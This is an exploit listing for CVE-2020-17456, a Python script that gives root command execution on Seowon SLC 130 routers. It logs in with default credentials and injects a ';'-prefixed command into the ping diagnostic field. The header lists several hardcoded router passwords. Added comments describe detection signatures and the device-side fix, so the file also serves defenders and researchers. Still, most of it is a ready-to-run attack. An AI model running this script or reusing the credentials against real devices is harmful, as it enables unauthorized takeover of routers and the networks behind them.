## https://sploitus.com/exploit?id=PACKETSTORM:158933
# Exploit Title: Seowon SlC 130 Router - Remote Code Execution  
# Author: maj0rmil4d - Ali Jalalat  
# Author website: https://secureguy.ir  
# Date: 2020-08-20  
# Vendor Homepage: seowonintech.co.kr  
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29  
# CVE: CVE-2020-17456  
# Version: Lync:Mac firmware 1.0.1, likely earlier versions  
# Tested on: Windows 10 - Parrot sec  
  
# Description:  
# A user can run arbitrary commands on the router as root.  
# Because the device already has hardcoded credentials, the exploit is easy to trigger.  
  
# credentials :   
# user => VIP  
# pwd => V!P83869000  
  
# user => Root  
# pwd => PWDd0N~WH*4G#DN  
  
# user => root  
# pwd => gksrmf28  
  
# user => admin  
# pwd => admin  
#   
  
# A write-up can be found at:  
# https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/  
  
import requests  
import sys  
  
# Proof-of-concept flow: log in to the router's web UI with a default
# account, then POST to the diagnostic (ping) CGI with a ';'-prefixed string
# in the field meant for an IP address, and print one line of the response.
#
# Usage as written: argv[1] is the base URL (it is concatenated directly with
# "/cgi-bin/..." so it must include the scheme), argv[2] is the string placed
# after the ';'. Either one missing raises IndexError.
host = sys.argv[1]  
  
# A Session is used so that any cookies set by the login response are sent
# again with the second request.
session = requests.Session()  
  
# Static, browser-like request headers reused for both POSTs. Several values
# are fixed literals that do not depend on the target or the body, which makes
# them usable as network signatures for this script as published:
#   - Content-Type reads "pplication/x-www-form-urlencoded" (sic)
#   - Accept / Accept-Language use "q:" where browsers send "q="
#   - Origin and Referer are always http://192.168.1.1, whatever `host` is
#   - Content-Length is a hard-coded "132", not computed from the body here
header = {   
  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",  
"Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",  
"Accept-Language": "en-US,en;q:0.5",  
"Accept-Encoding": "gzip, deflate",  
"Content-Type": "pplication/x-www-form-urlencoded",  
"Content-Length": "132",  
"Origin": "http://192.168.1.1",  
"Connection": "close",  
"Referer": "http://192.168.1.1/",  
"Upgrade-Insecure-Requests": "1"  
}  
  
  
  
# Login form fields. user/password is the admin/admin pair from the credential
# list in the header comment. The expires / browserTime / currentTime values
# are fixed literals (presumably copied from a captured browser login --
# not confirmed by this file); "expires" is already percent-encoded in the
# literal.
datas = {  
  
"Command":"Submit",  
"expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",  
"browserTime":"081119502020",  
"currentTime":"1597159205",  
"user":"admin",  
"password":"admin"  
}  
  
  
# Authentication step. The response is discarded: the script never checks
# whether the login succeeded before sending the second request.
# Defender note: because the header comment lists hardcoded accounts, the
# authentication requirement offers little protection; limiting which networks
# can reach the management web UI is the control that matters here.
  
session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)  
  
# Command-injection step (CVE-2020-17456 per the header comment).
  
cmd = sys.argv[2]  
  
# Form body for the diagnostic page in ping mode. Every field is a fixed
# literal except pingIpAddr.
# pingIpAddr: the encode("ISO-8859-1").decode() round trip returns ";"
# unchanged, so the value is simply ";" followed by the argv[2] string.
# NOTE(review): the device presumably interpolates this field into a shell
# command line without validation -- that is what the title's "Remote Code
# Execution" implies, but the server-side code is not shown here. The fix on
# the device side is to accept only a well-formed IP address / hostname in
# this field and to invoke ping without a shell.
# Detection: POSTs to /cgi-bin/system_log.cgi with Command=Diagnostic whose
# pingIpAddr contains anything other than address/hostname characters; the
# constant "T" value below also identifies unmodified copies of this script.
rce_data = {  
  
"Command":"Diagnostic",  
"traceMode":"ping",  
"reportIpOnly":"",  
"pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,  
"pingPktSize":"56",  
"pingTimeout":"30",  
"pingCount":"4",  
"maxTTLCnt":"30",  
"queriesCnt":"3",  
"reportIpOnlyCheckbox":"on",  
"btnApply":"Apply",  
"T":"1597160664082"  
}  
  
# Sent on the same session as the login, with the same static headers.
rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)  
  
# Extracts a single line from the response body: the text after the first '!',
# then after the second '[' within that, up to the next newline. Any further
# output lines are dropped, and an IndexError is raised if the response does
# not contain those delimiters (for example when the login was rejected --
# the exact failure page is not shown here).
print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])